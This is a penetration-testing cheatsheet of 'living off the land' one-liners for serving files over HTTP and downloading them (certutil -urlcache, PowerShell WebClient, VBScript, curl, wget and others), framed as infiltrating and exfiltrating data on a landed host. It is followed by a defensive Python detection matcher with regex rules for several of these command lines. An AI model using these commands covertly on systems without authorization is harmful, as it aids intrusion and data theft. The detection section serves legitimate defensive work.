Organic HTTP File Transfer

Living off the land is essential when it comes to penetrating networks. The box that you landed on may be bare bones, with only the default corporate software installed. Infiltrating and exfiltrating data is critical to mission success. This cheatsheet is not all-inclusive, but it should give you a good starting point for organic file transfer mechanisms.

HTTP Server One Liners

Lang/Cmd          One Liner
Busybox           busybox httpd -f -p <port>
Go                go get; serve -p <port>
Ncat              ncat --keep-open -l -p <port> -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat ~/file_to_serve"
Node              npm install -g node-static; static -p <port>
Perl              perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>8000); $s->mount("/"=>{path=>"."}); $s->start'
PHP >= 5.4        php -S <addr>:<port>
Python 2          python -m SimpleHTTPServer
Python 3          python -m http.server
Python (Twisted)  twistd -n web -p <port> --path ./
Ruby              ruby -rwebrick -e 'WEBrick::HTTPServer.new(:Port => 8000, :DocumentRoot => Dir.pwd).start'
Ruby 1.9.2+       ruby -run -ehttpd . -p8000

HTTP Get One Liners

Lang/Cmd     One Liner
certutil     certutil -urlcache -split -f http://target:port/file
curl         curl http://target:port/file -o output
ncat         printf "GET / HTTP/1.0\r\n\r\n" | nc target port | sed -e '1,/^\r/d' > output
Node.js      node -p "var http = require('http'); var fs = require('fs'); var file = fs.createWriteStream('output'); var request = http.get('http://target:port/', function(resp) { resp.pipe(file); });"
Perl         perl -e 'use LWP::Simple; getstore("http://target:port", "output");'
PHP          php -r '$data = @file_get_contents("http://target:port"); $fh = fopen("output", "w"); fwrite($fh, $data); fclose($fh);'
Powershell   powershell.exe -Command "& {(New-Object Net.WebClient).DownloadFile('http://target/dest', 'output')}"
Python       python -c 'import urllib, sys; sys.stdout.write(urllib.urlopen("http://target:port").read())' > output
Ruby         ruby -e 'require "net/http"; Net::HTTP.start("target", port) { |http| r = http.get("/file"); open("output", "wb") { |file| file.write(r.body) } }'
VBScript     echo Set o=CreateObject^("MSXML2.XMLHTTP"^):Set a=CreateObject^("ADODB.Stream"^):Set f=Createobject^("Scripting.FileSystemObject"^):o.open "GET", "http://target:port", 0:o.send^(^):If o.Status=200 Then >"%temp%.vbs" &echo a.Open:a.Type=1:a.Write o.ResponseBody:a.Position=0: >>"%temp%.vbs" &echo a.SaveToFile ".\output" >>"%temp%.vbs" &echo End if >>"%temp%.vbs" &cscript //B "%temp%.vbs" &del /F /Q "%temp%.vbs"
wget         wget http://target:port/file -O output
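Seen from the monitoring side, several of the one-liners in both tables leave a distinctive process command line. The following is an added example, not part of the original cheatsheet: a small matcher run over process-creation events, where the rule labels, host names, addresses and sample events are all constructed for illustration.

```python
import re

I = re.IGNORECASE
# Command-line signatures for one-liners listed on this page. curl and wget are
# left out on purpose: they are too common in normal use to alert on by name.
RULES = [
    ("certutil-download", re.compile(r"\bcertutil(\.exe)?\s.*[-/]urlcache\b.*https?://", I)),
    ("powershell-webclient", re.compile(r"\bpowershell(\.exe)?\s.*net\.webclient.*downloadfile", I)),
    ("python-http-server", re.compile(r"\bpython[\d.]*\s.*?-m\s+(simplehttpserver|http\.server)\b", I)),
    ("php-builtin-server", re.compile(r"\bphp\S*\s+-S\s+\S+:\d+")),  # -S is case-sensitive
    ("busybox-httpd", re.compile(r"\bbusybox\s+httpd\b", I)),
    ("ruby-httpd", re.compile(r"\bruby\s.*(-run\s+-e\s*httpd|-rwebrick\b)", I)),
]

def classify(cmdline):
    """Return the label of the first matching rule, or None."""
    for label, pattern in RULES:
        if pattern.search(cmdline):
            return label
    return None

def triage(events):
    """Return (host, label, cmdline) for every event that matches a rule."""
    hits = []
    for ev in events:
        label = classify(ev["cmdline"])
        if label:
            hits.append((ev["host"], label, ev["cmdline"]))
    return hits

# Constructed sample process-creation events (hosts and addresses are made up).
SAMPLE_EVENTS = [
    {"host": "ws-014", "cmdline": "certutil.exe -urlcache -split -f http://198.51.100.7:8000/a.bin a.bin"},
    {"host": "ws-014", "cmdline": "certutil -verify cert.cer"},
    {"host": "ws-022", "cmdline": "powershell.exe -Command (New-Object Net.WebClient).DownloadFile('http://198.51.100.7/x','x')"},
    {"host": "build-03", "cmdline": "python3 -m http.server 8000"},
    {"host": "build-03", "cmdline": "python3 manage.py test"},
    {"host": "web-01", "cmdline": "php -S 0.0.0.0:8080"},
]

if __name__ == "__main__":
    for host, label, cmdline in triage(SAMPLE_EVENTS):
        print(f"{host}\t{label}\t{cmdline}")
```

Matching on names alone is easy to sidestep by renaming a binary, so rules like these work best paired with network telemetry for new listeners and unexpected outbound HTTP.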

